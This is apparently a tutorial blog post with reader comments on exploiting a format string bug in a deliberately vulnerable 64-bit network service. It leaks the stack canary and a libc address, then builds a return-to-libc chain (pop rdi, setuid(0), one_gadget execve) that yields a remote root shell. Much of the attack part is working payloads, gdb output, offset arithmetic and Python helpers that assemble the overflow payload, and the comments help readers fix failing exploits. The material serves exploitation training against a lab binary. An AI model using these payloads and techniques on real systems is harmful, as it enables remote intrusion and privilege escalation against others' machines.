Format String Exploits: Defeating Stack Canary, NX and ASLR Remotely on 64 bit



Hey, welcome back. Last time we learned how to bypass the NX bit by making the stack executable again with functions like mprotect() and then running our shellcode. This time we will look at a different class of vulnerability from our usual stack overflows. Format string vulnerabilities look innocent at first, but they can put a lot of critical information at an attacker's disposal. We will develop a remote exploit and defeat the stack canary, the NX bit and ASLR.


Let's dive into a simple example program. It first asks for the user's name and then for a secret code. It could go on to verify the code or do something else with it, but for now we only care about this part. You can clearly see a buffer overflow vulnerability: the secret code is read with gets(). A read() call with improper bounds checks would cause the same problem. Buffering for stdin and stdout is turned off with setvbuf() because we will serve this program over a network. Did you notice 'printf(name);' on line 21 of the code? It looks like a lazy programmer's mistake: the buffer pointed to by name is passed directly as the format string instead of as an argument to a format such as "%s". It seems innocent, but what happens if we put format specifiers into name? Let's find out. First compile the code. We are on a 64-bit system, and this time we keep all the default protection mechanisms and ASLR on, so no extra flags are required. On the target server, make the binary setuid root.
virtual@mecha:~$ gcc format.c -o format
virtual@mecha:~$ sudo chown root format
virtual@mecha:~$ sudo chmod +s format
Now we will serve it on a port with this command.
virtual@mecha:~$ socat tcp-listen:5555,reuseaddr,fork, exec:"./format"
It listens on TCP port 5555 and executes "./format" whenever a connection is made. You can check it by connecting to the server on port 5555 with netcat or telnet.
virtual@mecha:~$ nc 192.168.1.4 5555
What is your name?
Name: Attacker
Hello Attacker
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
Great, it's working over the network. Let's pass some format specifiers as the name. I have passed '%lx' 15 times, separated by '-'.
virtual@mecha:~$ nc 192.168.1.4 5555
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello 7ffeae3fd1b0-7f69459f8720-0-7f6945bde4c0-7f6945bde4c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffeae3ff980-9a7b045172d7ef00
Enter secret code !
Code: s3cr3tc0d3
Entered Command centre with code > s3cr3tc0d3 .
What are those weird hexadecimal values? Notice that '2d786c25' keeps repeating. Look it up in an ASCII table and, read in little-endian byte order, it is the hex for '%lx-'. That is our own input, which means the format string has printed the contents of the stack back to us. Some addresses are leaked too. You can verify this by loading the program in gdb and dumping the stack. '%lx' prints a long in hexadecimal, which we need because this is 64-bit, and '-' separates the values. In this article we will use those leaked addresses to find the libc base address and to leak the stack canary. We will then use this leaked memory to do a successful return to libc by overflowing the buffer while entering the secret code. Let's load the program in gdb and analyze it.
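To check the decoding yourself, here is a small Python 3 sketch. The helper name decode_leaked_word is mine and not part of the target program. It treats one leaked '%lx' value as the 8 bytes it occupied in memory on a little-endian machine, which shows that the repeated values are just our own input.

```python
import struct


def decode_leaked_word(hex_text):
    """Return the bytes one leaked %lx value occupied in memory (little-endian)."""
    value = int(hex_text, 16)
    raw = struct.pack("<Q", value)   # 8 bytes, least significant byte first
    return raw.rstrip(b"\x00")       # drop the zero padding of short values


if __name__ == "__main__":
    print(decode_leaked_word("2d786c252d786c25"))  # b'%lx-%lx-'
    print(decode_leaked_word("a786c25"))           # b'%lx\n'
```

The second value is the tail of the name buffer: the last '%lx' followed by the newline we typed.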
virtual@mecha:~$ gdb format -q
Reading symbols from format...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : ENABLED
RELRO     : Partial
gdb-peda$ aslr
ASLR is OFF
gdb-peda$ disas center 
Dump of assembler code for function center:
   0x0000000000000815 <+0>: push   rbp
   0x0000000000000816 <+1>: mov    rbp,rsp
   0x0000000000000819 <+4>: sub    rsp,0x90
   0x0000000000000820 <+11>: mov    rax,QWORD PTR fs:0x28
   0x0000000000000829 <+20>: mov    QWORD PTR [rbp-0x8],rax
   0x000000000000082d <+24>: xor    eax,eax
   0x000000000000082f <+26>: lea    rdi,[rip+0x1b2]        # 0x9e8
   0x0000000000000836 <+33>: mov    eax,0x0
   0x000000000000083b <+38>: call   0x6e0 <printf@plt>
   0x0000000000000840 <+43>: lea    rax,[rbp-0x90]
   0x0000000000000847 <+50>: mov    rdi,rax
   0x000000000000084a <+53>: mov    eax,0x0
   0x000000000000084f <+58>: call   0x710 <gets@plt>
   0x0000000000000854 <+63>: lea    rax,[rbp-0x90]
   0x000000000000085b <+70>: mov    rsi,rax
   0x000000000000085e <+73>: lea    rdi,[rip+0x1a3]        # 0xa08
   0x0000000000000865 <+80>: mov    eax,0x0
   0x000000000000086a <+85>: call   0x6e0 <printf@plt>
   0x000000000000086f <+90>: nop
   0x0000000000000870 <+91>: mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000000874 <+95>: xor    rax,QWORD PTR fs:0x28
   0x000000000000087d <+104>: je     0x884 <center+111>
   0x000000000000087f <+106>: call   0x6d0 <__stack_chk_fail@plt>
   0x0000000000000884 <+111>: leave  
   0x0000000000000885 <+112>: ret    
End of assembler dump.
gdb-peda$ b *center +95
Breakpoint 1 at 0x874
As you can see, most memory protections, such as the stack canary and the NX bit, are on. We keep ASLR disabled in gdb for now so that analysis is easier. We have already verified the format string vulnerability in name, so let's check the buffer overflow and the stack canary. Disassemble the center function and set a breakpoint at *center+95, where the canary is compared with the reference value before the program decides whether to call __stack_chk_fail.

Stack Canaries

Stack canaries are random bytes placed between a function's local buffers and its saved frame pointer and return address, and checked before the function returns. If a buffer overflow occurs, the canary is overwritten, the check fails and the program aborts through __stack_chk_fail. On Linux the lowest byte of the canary is typically a null byte (notice the trailing '00' in the last leaked value above), which makes exploitation harder with string functions that stop at a null. We don't have to worry about that here, because gets() only stops at a newline. We will leak the canary through the format string vulnerability. Bruteforcing it can be an option on 32-bit systems, but it is not really feasible on 64-bit. Run the program with the format string, and this time fill the code buffer with 128 'A's.
gdb-peda$ r
Starting program: /home/archer/compiler_tests/format 
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-
Hello 7ffec094b550-7fbb5533a720-0-7fbb555204c0-7fbb555204c0-2d786c252d786c25-2d786c252d786c25-
2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a2d786c25-
7ffec094dd20-7068c9a76fdc1c00-
Enter secret code !
Code: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[----------------------------------registers-----------------------------------]
RAX: 0x7068c9a76fdc1c00 
RBX: 0x0 
RCX: 0x0 
RDX: 0x7fbb5533a720 --> 0x0 
RSI: 0x7ffec094b4b0 ("Entered Command center with code > ", 'A' , " .\n94b550-7fbb5533a720-0-7fbb555204c0"...)
RDI: 0x0 
RBP: 0x7ffec094dbe0 --> 0x7ffec094dc40 --> 0x555aec917960 (<__libc_csu_init>: push   r15)
RSP: 0x7ffec094db50 ('A' )
RIP: 0x555aec917874 (<center+95>: xor    rax,QWORD PTR fs:0x28)
R8 : 0x7fbb555204c0 (0x00007fbb555204c0)
R9 : 0x7ffec094af60 --> 0x0 
R10: 0x0 
R11: 0x246 
R12: 0x555aec917730 (<_start>: xor    ebp,ebp)
R13: 0x7ffec094dd20 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x555aec91786a <center+85>: call   0x555aec9176e0 <printf@plt>
   0x555aec91786f <center+90>: nop
   0x555aec917870 <center+91>: mov    rax,QWORD PTR [rbp-0x8]
=> 0x555aec917874 <center+95>: xor    rax,QWORD PTR fs:0x28
   0x555aec91787d <center+104>: je     0x555aec917884 <center+111>
   0x555aec91787f <center+106>: call   0x555aec9176d0 <__stack_chk_fail@plt>
   0x555aec917884 <center+111>: leave  
   0x555aec917885 <center+112>: ret
[------------------------------------stack-------------------------------------]
0000| 0x7ffec094db50 ('A' )
0008| 0x7ffec094db58 ('A' )
0016| 0x7ffec094db60 ('A' )
0024| 0x7ffec094db68 ('A' )
0032| 0x7ffec094db70 ('A' )
0040| 0x7ffec094db78 ('A' )
0048| 0x7ffec094db80 ('A' )
0056| 0x7ffec094db88 ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0000555aec917874 in center ()
The stack canary, '0x7068c9a76fdc1c00', is loaded into the rax register and then checked. If you look at the memory dumped by our format string, the last value is exactly this canary. Yeah, we leaked the stack canary. First problem solved. To bypass the NX bit we will do a return to libc. But since ASLR will be on, we need to find the libc base address on every run. To solve this we will use the addresses leaked by the format string. You can leak stack addresses the same way to find the approximate position of your shellcode.
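Pulling the canary out of the reply is simple string handling. The following Python 3 sketch assumes the reply has the 'Hello v1-v2-...' shape shown above and that the canary sits in the 15th slot, which is where it showed up in this run but may differ on another build. parse_leak is a hypothetical helper name.

```python
def parse_leak(line):
    """Split a 'Hello v1-v2-...' reply into a list of integers."""
    body = line.strip()
    if body.startswith("Hello "):
        body = body[len("Hello "):]
    # Empty tokens (from a trailing '-') are skipped.
    return [int(token, 16) for token in body.split("-") if token]


if __name__ == "__main__":
    # The reply from the gdb run above, joined back into one line.
    reply = ("Hello 7ffec094b550-7fbb5533a720-0-7fbb555204c0-7fbb555204c0-"
             + "2d786c252d786c25-" * 7
             + "a2d786c25-7ffec094dd20-7068c9a76fdc1c00-")
    values = parse_leak(reply)
    canary = values[14]              # 15th value, assumed canary slot
    print(hex(canary))               # 0x7068c9a76fdc1c00
    print(canary & 0xff == 0)        # True: lowest byte is null
```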
gdb-peda$ vmmap
Start              End                Perm Name
0x00007fbb54f82000 0x00007fbb55135000 r-xp /usr/lib/libc-2.27.so
If you look carefully at the dumped values, you will notice that some of them look like libc addresses. They are leftovers from earlier function calls, and each run of the program leaves them in the same stack slots. With ASLR on the absolute addresses change, but each one still points to the same place in the library, which means it has the same offset from the libc base every time. We can take one of these addresses, calculate its offset from the libc base once, and then use that offset on every run to recover the base. Time to turn ASLR on and find the offset.
gdb-peda$ aslr on
gdb-peda$ aslr
ASLR is ON
gdb-peda$ r
Starting program: /home/archer/compiler_tests/format 
What is your name?
Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx 
Hello 7ffe72f66210-7fc16bb5a720-0-7fc16bd404c0-7fc16bd404c0-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c25-7ffe72f689e0-87f4107dcd08200
Enter secret code !
Code: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[----------------------------------registers-----------------------------------]
RAX: 0x87f4107dcd08200 
RBX: 0x0 
RCX: 0x0 
RDX: 0x7fc16bb5a720 --> 0x0 
RSI: 0x7ffe72f66170 ("Entered Command center with code > ", 'A' , " .\nf66210-7fc16bb5a720-0-7fc16bd404c0"...)
RDI: 0x0 
RBP: 0x7ffe72f688a0 --> 0x7ffe72f68900 --> 0x5581705e8960 (<__libc_csu_init>: push   r15)
RSP: 0x7ffe72f68810 ('A' )
RIP: 0x5581705e8874 (<center+95>: xor    rax,QWORD PTR fs:0x28)
R8 : 0x7fc16bd404c0 (0x00007fc16bd404c0)
R9 : 0x7ffe72f65c20 --> 0x0 
R10: 0x0 
R11: 0x246 
R12: 0x5581705e8730 (<_start>: xor    ebp,ebp)
R13: 0x7ffe72f689e0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x5581705e886a <center+85>: call   0x5581705e86e0 <printf@plt>
   0x5581705e886f <center+90>: nop
   0x5581705e8870 <center+91>: mov    rax,QWORD PTR [rbp-0x8]
=> 0x5581705e8874 <center+95>: xor    rax,QWORD PTR fs:0x28
   0x5581705e887d <center+104>: je     0x5581705e8884 <center+111>
   0x5581705e887f <center+106>: call   0x5581705e86d0 <__stack_chk_fail@plt>
   0x5581705e8884 <center+111>: leave  
   0x5581705e8885 <center+112>: ret
[------------------------------------stack-------------------------------------]
0000| 0x7ffe72f68810 ('A' )
0008| 0x7ffe72f68818 ('A' )
0016| 0x7ffe72f68820 ('A' )
0024| 0x7ffe72f68828 ('A' )
0032| 0x7ffe72f68830 ('A' )
0040| 0x7ffe72f68838 ('A' )
0048| 0x7ffe72f68840 ('A' )
0056| 0x7ffe72f68848 ('A' )
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x00005581705e8874 in center ()
gdb-peda$ vmmap
Start              End                Perm Name
0x00007fc16b7a2000 0x00007fc16b955000 r-xp /usr/lib/libc-2.27.so
I am choosing the 4th address, which seems to be from libc, and calculating its offset from the libc base.
0x7fc16bd404c0-0x00007fc16b7a2000 = 0x59e4c0
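In Python 3 the same arithmetic, and its use in reverse at exploit time, looks like this. It is only a sketch: the constant is specific to the libc 2.27 build used in this article, and libc_base_from_leak is a made-up helper name. The page-alignment check is a cheap sanity test, since a correct base always ends in '000'.

```python
# Offset of the 4th leaked value from the libc base, measured once in gdb.
LEAK_TO_BASE = 0x7fc16bd404c0 - 0x7fc16b7a2000   # 0x59e4c0


def libc_base_from_leak(leaked_fourth):
    """Recover the libc base from the 4th value printed by the format string."""
    base = leaked_fourth - LEAK_TO_BASE
    if base & 0xfff:
        # A mapped library starts on a page boundary; anything else means
        # the wrong slot or a different libc build.
        raise ValueError("base %#x is not page aligned" % base)
    return base


if __name__ == "__main__":
    # 4th value from the earlier run with ASLR off; vmmap showed 0x7fbb54f82000.
    print(hex(libc_base_from_leak(0x7fbb555204c0)))  # 0x7fbb54f82000
```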
Cool. On my system this offset is the same on every run for the 4th address. Now you can find the offsets to the stack canary and the return address, either from a direct stack dump or with a pattern.
0x7ffe72f68870: 0x4141414141414141 0x4141414141414141
0x7ffe72f68880: 0x4141414141414141 0x4141414141414141
0x7ffe72f68890: 0x0000000000000000 0x087f4107dcd08200  <== canary
0x7ffe72f688a0: 0x00007ffe72f68900 0x00005581705e893d  <== return address
virtual@mecha:~$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x3765413665413565
[*] Exact match at offset 136
It turned out to be 136 bytes to the stack canary and 152 bytes to the return address on my system. So the layout is
code = 'A'*136 + canary(8) + 'B'*8 + return_address(8)
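If you don't have Metasploit installed, the pattern lookup can be reproduced in a few lines. This Python 3 sketch assumes the usual Metasploit pattern ordering (uppercase letter, lowercase letter, digit: Aa0Aa1Aa2...) and that the value you look up is a 64-bit little-endian word as gdb prints it. The function names are mine.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def make_pattern(length):
    """Build a non-repeating Aa0Aa1Aa2... pattern of the requested length."""
    chunks = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if len(chunks) * 3 >= length:
            break
        chunks.append(upper + lower + digit)
    return "".join(chunks)[:length].encode()


def pattern_offset(qword, length=1024):
    """Return the offset of a 64-bit value inside the pattern, or -1."""
    needle = struct.pack("<Q", qword)   # bytes in the order they sat in memory
    return make_pattern(length).find(needle)


if __name__ == "__main__":
    # Value found where the canary should have been after sending the pattern.
    print(pattern_offset(0x3765413665413565))  # 136
```

Send make_pattern(200) as the secret code, read the overwritten canary at the breakpoint, and pass that value to pattern_offset.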
Put your glasses on, it's time to write the remote exploit.


Since we are serving the program over a network, I will simply use telnetlib in Python to connect and interact with it. You can use the pwntools library too, but for simplicity I'm just using telnetlib. You can read more on pwntools here. We will see more of pwntools in future articles.

Our strategy is to first send the format string, then read the output and extract a libc address and the stack canary. From the address we calculate the libc base and generate a return-to-libc payload. We call setuid(0) first, because shells such as bash typically drop setuid privileges when the real and effective user IDs differ. Since this is 64-bit, the argument goes in a register: we pop 0x0 into rdi and it is passed to setuid. To execute '/bin/sh' I'm simply using a one_gadget execve. You can use this tool to find one_gadgets, or install it simply with $ gem install one_gadget.

One thing we are assuming here is that we know the libc version of the target, and we craft the return to libc accordingly. When you don't know the libc version, you can leak more memory and try to match offsets against the dumped addresses. Online libc databases also help to identify the target's libc version. Notice that the last 3 hex digits of the libc base address are always '000' because the library is mapped on a page boundary, so the last 3 digits of a leaked address are the same as the last 3 digits of its offset. This is even easier on 32-bit as the addresses are smaller. We can also leak addresses from the Global Offset Table. Good places to search are libc.blukat.me and libcdb.com. I also found a repository with a big database of libcs here. We will learn more about using such leaks, and more ways to leak, in the next articles.
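The '000' observation can be turned into a quick filter when you are guessing the libc version. Below is a minimal Python 3 sketch, assuming you have leaked the runtime address of a known symbol (setuid here) and collected that symbol's offset for several candidate builds. The second candidate and its offset are made up for illustration, and matching_candidates is a hypothetical helper name.

```python
PAGE_MASK = 0xfff   # the low 12 bits are not touched by ASLR


def low12(address):
    """Return the last 3 hex digits of an address or offset."""
    return address & PAGE_MASK


def matching_candidates(leaked_address, candidates):
    """Keep the libc builds whose symbol offset agrees with the leak."""
    return [name for name, offset in candidates.items()
            if low12(offset) == low12(leaked_address)]


if __name__ == "__main__":
    candidates = {
        "libc 2.27 (this article)": 0xc67a0,   # setuid offset from readelf
        "other build (made up)": 0xc6f10,      # illustrative value only
    }
    leaked_setuid = 0x7fc16b7a2000 + 0xc67a0   # what a GOT leak would show
    print(matching_candidates(leaked_setuid, candidates))
```

A single symbol rarely narrows it down to one build, so in practice you would compare two or three leaked symbols.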
virtual@mecha:~$ one_gadget /usr/lib/libc.so.6
0x43b88 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x43bdc execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xe49c0 execve("/bin/sh", rsp+0x60, environ)
constraints:
  [rsp+0x60] == NULL
You can find more ROP gadgets, such as the 'pop rdi; ret' we need, with the ROPgadget or Ropper tools. Then find the offset of setuid.
virtual@mecha:~$ readelf -a /usr/lib/libc.so.6 | grep setuid
    23: 00000000000c67a0   145 FUNC    WEAK   DEFAULT   12 setuid@@GLIBC_2.2.5
  1604: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS setuid.c
  5134: 00000000000c67a0   145 FUNC    LOCAL  DEFAULT   12 __setuid
  5878: 00000000000c67a0   145 FUNC    WEAK   DEFAULT   12 setuid
Putting everything together, here's my simple exploit code. I have commented each line with an explanation. Here's how the stack layout will look after the exploit.
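For reference, here is a minimal Python 3 sketch of how such a payload can be assembled from the pieces above. It is not the exploit script itself: build_payload is a hypothetical helper, the choice of the first one_gadget (0x43b88) is my assumption, and the 'pop rdi; ret' offset must come from ROPgadget or Ropper on the target's libc, so the value in the usage lines is only a placeholder.

```python
import struct

SETUID_OFFSET = 0xc67a0       # from the readelf output above
ONE_GADGET_OFFSET = 0x43b88   # assumed choice: first one_gadget candidate
CANARY_OFFSET = 136           # bytes from the start of the buffer to the canary


def p64(value):
    """Pack a 64-bit value in little-endian byte order."""
    return struct.pack("<Q", value)


def build_payload(canary, libc_base, pop_rdi_offset,
                  one_gadget_offset=ONE_GADGET_OFFSET):
    """Lay out: padding, canary, saved rbp, then setuid(0) and the one_gadget."""
    payload = b"A" * CANARY_OFFSET
    payload += p64(canary)                         # keep the canary check happy
    payload += b"B" * 8                            # saved rbp, value unused
    payload += p64(libc_base + pop_rdi_offset)     # pop rdi; ret
    payload += p64(0)                              # rdi = 0
    payload += p64(libc_base + SETUID_OFFSET)      # setuid(0)
    payload += p64(libc_base + one_gadget_offset)  # execve("/bin/sh", ...)
    if b"\n" in payload:
        # gets() stops at a newline, so such a payload would be cut short.
        raise ValueError("payload contains a newline byte")
    return payload


if __name__ == "__main__":
    # Canary and base from the run below; 0x21111 is a placeholder offset.
    payload = build_payload(0x3fe25b5b8083e400, 0x7fb462891000, 0x21111)
    print(len(payload))   # 184
```

On success setuid(0) returns 0 in rax, which should satisfy the 'rax == NULL' constraint of that gadget. If the shell does not spawn, try the other one_gadget offsets.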


Run it.
virtual@mecha:~$ python2 format.py                          
Enter this command to setup a server. 5555 is port !
 $ socat tcp-listen:5555,fork, exec:'./format'

[i] Enter target ip (localhost): 192.168.43.204
[i] Enter target port (5555): 5555
[i] Connecting to server
What is your name?
Name:
[' Hello 7ffdec247930', '7fb462c49720', '0', '7fb462e2f4c0', '7fb462e2f4c0', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c252d786c25', '2d786c25', '7ffdec24a100', '3fe25b5b8083e400', 'Enter secret code !\nCode:']
[+] Found Stack Canary   : 0x3fe25b5b8083e400
[+] Calculated Libc base : 0x7fb462891000
[i] Payload generated
 Entered Command center with code > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .
[+] Shell ready. Enter commands !

uid=0(root) gid=1000(virtual) groups=1000(virtual),10(wheel)
whoami
root
pwd
/home/virtual/
Awesome. We wrote a remote exploit, and as the service was running with root privileges, we got root.


Well, that's all for now. In the next articles we will learn more about the GOT and PLT, how powerful format string exploits can be, and more exploitation techniques. Keep practicing.

For any queries contact : @ShivamShrirao

Next Read: Return to PLT, GOT to bypass ASLR remotely

Comments

  1. Can you please help me out with the following situation?

    When i executed format.py i could get the stack canary , calculated libc ,payload value and could reach till this line [+] Shell ready. Enter commands ! -in my output , but could not get the remote connection to the machine.
    When I executed my format.py file and when it reaches this this line [+] Shell ready. Enter commands !--its displays that connection closed from the server.
    Not sure what I missed. I did find one_gadget, pop_rdi and setUid values for my system.
    Also that I could not understand why are we using metasploit and what is pattern_offset.rb doing in the below mentioned command?
    "/opt/metasploit/tools/exploit/pattern_offset.rb -q 0x3765413665413565"
    In the above command I am not sure how are you generating this value -"0x3765413665413565".

    Your timely response would be highly appreciated.

    Looking forward for your response.

    Thanks,
    Varsha

    Replies
    1. Regarding metasploit, I am using that to create a long pattern, So when the buffer overflow occurs registers/memory is overwritten, I can see what pattern it is overwritten by and calculate offset easily instead of trying with different lengths. You can read more about it here https://www.ret2rop.com/2018/08/stack-based-buffer-overflow-x64.html

      Regarding exploit failing I think most likely your one_gadget isn't working. Sometimes it happens when registers don't have correct value. Try few other one_gadgets, or u can make execve('/bin/sh') or system('sh') chain. I have explained that in some of my other articles. Also to be sure do try attaching the target program to gdb and checking the exploit execution step by step.

  2. when i use the exact same code i don´t get the Library addresses leaked. Did something change in terms of security on Ubuntu or am i doing somethin wrong?

    My Result:
    What is your name?
    Name: %lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
    Hello 7fff52dd39d0-0-0-6-6-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-2d786c252d786c25-a786c252d786c25-7fff52dd61b0-8e04e06c68602600-0
    �a�R�Enter secret code !
    Code: gfdfdfdf
    Entered Command center with code > gfdfdfdf .

    Replies
    1. In your results I can see the addresses are leaked. These are some random left over addresses and memory on the stack. So they may or may not contain libc address at the exact place as they mostly don't have any particular order.
      The values starting with "7fff" in your dump look like stack addresses rather than libc ones. You can check any candidate by comparing it with the range of libc addresses from the "vmmap" command.
      If not you may have to try longer sequences to dump more memory and also try indexing the format strings as I have discussed in next articles till you find some useful addresses. Btw I recommend using "%p" instead of "%lx", so your payloads will be shorter.

  3. What part of exploit exactly are you facing the problem ? Also while debugging it is better to first turn off the ASLR so that addresses don't change and then you can turn it on once you can do it with aslr off.

  4. If you disable ASLR, the addresses will remain the same so you don't have to calculate again and again. You can also debug while using the exploit script by `at`taching to the server process with gdb.

  5. First run the server and connect to it. Don't send any data. Start gdb as root and find the pid of the server process. Then enter `at pid` in gdb, replace pid with pid of process. Then u can debug the running process. Setup breakpoints and enter `c`ontinue.

  6. If you are attaching to the process you can just send input through your python script, like the final exploit script I am using in the article.

  7. You can send input through your already established netcat connection.

  8. Type or pipe into that netcat connection.
    Or
    Connect with telnet/sockets in python like my exploit script and send input through that connection.

  9. Run the script. Connect script to server. A buf process is spawned asking for input. Do not send input from script. Attach to that process in gdb. Set breakpoints, continue. Then continue the script and send the input.

    Btw with some bash tricks pipes can also dynamically send input but I would suggest just stick to the script.

  10. If you know python you know you can edit the script to do whatever you want it to do ?

  11. Excellent article! Question - Does having ASLR on affect leaked information via format string? When ASLR is on, I get less output from e.g. %p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p... than I do when ASLR is off. When ASLR Is on, it shows `(nil)` for many addresses. Is there some other anti-format string protection?

